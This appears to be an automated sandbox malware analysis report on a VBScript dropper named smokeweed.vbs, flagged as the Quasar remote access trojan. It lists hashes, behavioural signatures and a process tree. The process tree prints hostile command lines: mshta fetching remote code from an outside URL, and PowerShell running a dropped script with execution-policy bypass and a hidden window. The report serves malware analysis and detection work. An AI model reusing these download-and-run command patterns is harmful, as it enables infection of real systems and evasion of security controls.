Overview

overview

10

Static

static

smokeweed.vbs

windows7_x64

10

smokeweed.vbs

windows10_x64

10

Analysis

  • max time kernel
    64s
  • max time network
    131s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    26-02-2021 08:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    smokeweed.vbs

  • Size

    3KB

  • MD5

    07b8be238ea7e4d28ab60dd6c485f663

  • SHA1

    73c2226a8592f0a729a837013d40e5b55ecb4415

  • SHA256

    78a881cbc86ce0458d8db0eae0c92a8e016537796ef3ab7928037f4a51d4ca2f

  • SHA512

    9d1bcf4a17c4b7986e2fec74f0d4ba020ea2e4933ff9cad19a639d87f0998a32439a227bcd55bf37d08886276a11ede28f06a60af12b6a368b5cdbd2544cf7a0

Score
10/10
quasarspywaretrojan

Malware Config

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Blocklisted process makes network request 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:880
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs" /elevate
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2064
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://z.zz.ht/bBtXS.txt
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:3744
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1352
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2692

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    MD5

    2143b379fed61ab5450bab1a751798ce

    SHA1

    32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

    SHA256

    a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

    SHA512

    0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

    Download Submit
  • C:\Users\Public\Datax.ps1
    MD5

    c85a52e535d54935f25bc43e8b393b1a

    SHA1

    963baebff776005de53b5c68608c5c5205400b50

    SHA256

    0545f59b84c4323711d72e396797694068bd7a56695aea0cdd90352a4a0c7753

    SHA512

    729398ee2dbb41b6f38c106dd3a75fbb695f700b009e6f5267f4242588764a5b3b407b7e2fbb17f9fd4cfc8684e04c39c2e68b6b400de750c2c2c4967d49f184

    Download Submit
  • memory/1352-12-0x00007FF9415B0000-0x00007FF941F9C000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/1352-21-0x0000021598490000-0x0000021598496000-memory.dmp
    Filesize

    24KB

    Download
  • memory/1352-20-0x00000215FF8D8000-0x00000215FF8DA000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1352-19-0x00000215FF8D6000-0x00000215FF8D8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1352-15-0x00000215FF8D3000-0x00000215FF8D5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1352-14-0x00000215FF8D0000-0x00000215FF8D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1352-11-0x0000000000000000-mapping.dmp
    Download
  • memory/2064-2-0x0000000000000000-mapping.dmp
    Download
  • memory/2324-9-0x0000025BED540000-0x0000025BED541000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2324-10-0x0000025BED860000-0x0000025BED861000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2324-8-0x0000025BD3A43000-0x0000025BD3A45000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2324-7-0x0000025BD3A40000-0x0000025BD3A42000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2324-6-0x0000025BD3A50000-0x0000025BD3A51000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2324-5-0x00007FF9415B0000-0x00007FF941F9C000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/2324-4-0x0000000000000000-mapping.dmp
    Download
  • memory/2692-24-0x0000000073500000-0x0000000073BEE000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/2692-22-0x0000000000400000-0x000000000045E000-memory.dmp
    Filesize

    376KB

    Download
  • memory/2692-23-0x000000000045819E-mapping.dmp
    Download
  • memory/2692-27-0x00000000054E0000-0x00000000054E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2692-28-0x0000000004FE0000-0x0000000004FE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2692-30-0x0000000004FA0000-0x0000000004FA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2692-31-0x0000000004F30000-0x0000000004F31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2692-32-0x00000000054A0000-0x00000000054A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2692-33-0x00000000061D0000-0x00000000061D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2692-34-0x0000000006900000-0x0000000006901000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3744-3-0x0000000000000000-mapping.dmp
    Download